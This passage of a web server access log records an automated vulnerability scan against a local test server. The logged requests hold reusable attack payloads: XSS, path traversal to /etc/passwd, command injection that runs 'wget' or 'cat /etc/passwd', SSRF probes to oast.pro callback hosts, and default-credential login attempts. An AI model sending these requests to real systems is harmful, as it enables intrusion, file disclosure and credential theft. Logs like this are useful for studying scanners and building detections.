Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/idx-broker-platinum/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm(29KBxccHz1c3oKKQmuP7ZYNdwgc)%3c%2fscript%3e&win=2707 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://ca28bc0smpvbbtig07h0h67e6tss4fsty.oast.pro; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.531","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/wdisp/admin/public/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/0 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B1example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com/%2f.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"j_username=admin&j_password=password","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pentaho/j_spring_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sql.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?page=pie-register&show_dash_widget=1&invitaion_code=PC9zY3JpcHQ+PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_plugin/head/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"userName=admin&password=123456","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /xxl-job-admin/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.zul HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SecMail/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"lang=en_US&cat_id=6\x22>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?ajax-request=jnews HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v1/pods HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%80%B5example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/test.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /filezilla.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /AirWatch/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /temp.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=snippets&snippets-safe-mode%5B0%5D=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/new-year-firework/firework/index.php?text=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.vm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /users/sign_in HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/jobs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/canto/includes/lib/detail.php?subdomain=ca28bc0smpvbbtig07h0kieb6gbxxzide.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/haberadam/api/mobile-info.php?id= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/?next=%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?class=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://ca28bc0smpvbbtig07h056af6gihogcug.oast.pro HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.//WEB-INF/classes/META-INF/microprofile-config.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/airflow/code?root=&dag_id=example_passing_params_via_test_command HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/2 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /m_login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%E3%82%9Dexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.github/workflows/tests.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitemanager.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /translate.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:03 +0000","request_body":"{\x0D\x0A \x22token\x22: {\x0D\x0A \x22$func\x22: \x22var_dump\x22\x0D\x0A }\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/newpassword HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 